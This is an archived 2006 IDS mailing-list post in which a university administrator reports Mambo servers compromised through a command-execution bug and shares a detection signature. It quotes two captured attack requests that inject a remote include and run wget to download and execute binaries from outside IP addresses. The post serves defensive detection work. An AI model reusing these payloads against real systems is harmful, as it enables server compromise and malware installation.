[prev in list] [next in list] [prev in thread] [next in thread]
List: dragonidsuser
Subject: [Dragonidsuser] mambo attacks/probes
From: Mike Iglesias <iglesias () draco ! acs ! uci ! edu>
Date: 2006-03-08 19:21:22
Message-ID: 200603081921.k28JLMgo014051 () draco ! acs ! uci ! edu
[Download RAW message or body]
We had a system or two compromised via the Mambo "Function.php arbitrary
command execution" bug, so we have setup a signature to catch the
probes/attacks when they happen.
Here are a couple of example attacks:
GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mos \
Config_absolute_path=http://204.83.56.144/cmd.gif?&cmd=cd%20/tmp;wget%20204.83.56.144/gicupo;chmod%20744%20gicupo;./gicupo;echo%20YYY;echo| \
HTTP/1.1{A}
GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConf \
ig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| \
HTTP/1.1{A}
Here's the signature we are using to catch these:
T D A S 10 200 W UCI:MAMBO-ATTACK /2fmambo/2f , wget
If you have a better way to catch these, please let me know.
Mike Iglesias Email: iglesias@uci.edu
University of California, Irvine phone: 949-824-6926
Network & Academic Computing Services FAX: 949-824-2069
_______________________________________________
Dragonidsuser mailing list
For help please follow the below instructions.
You can make subsciption adjustments via email by sending a message to:
Dragonidsuser-request@enterasys.com
with the word `help' in the subject or body (don't include the quotes), and you will \
get back a message with instructions.
You must know your password to change your options (including changing the password, \
itself) or to unsubscribe. If you forget your password, don't worry, you will \
receive a monthly reminder telling you what all your enterasys.com mailing list \
passwords are, and how to unsubscribe or change your options.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic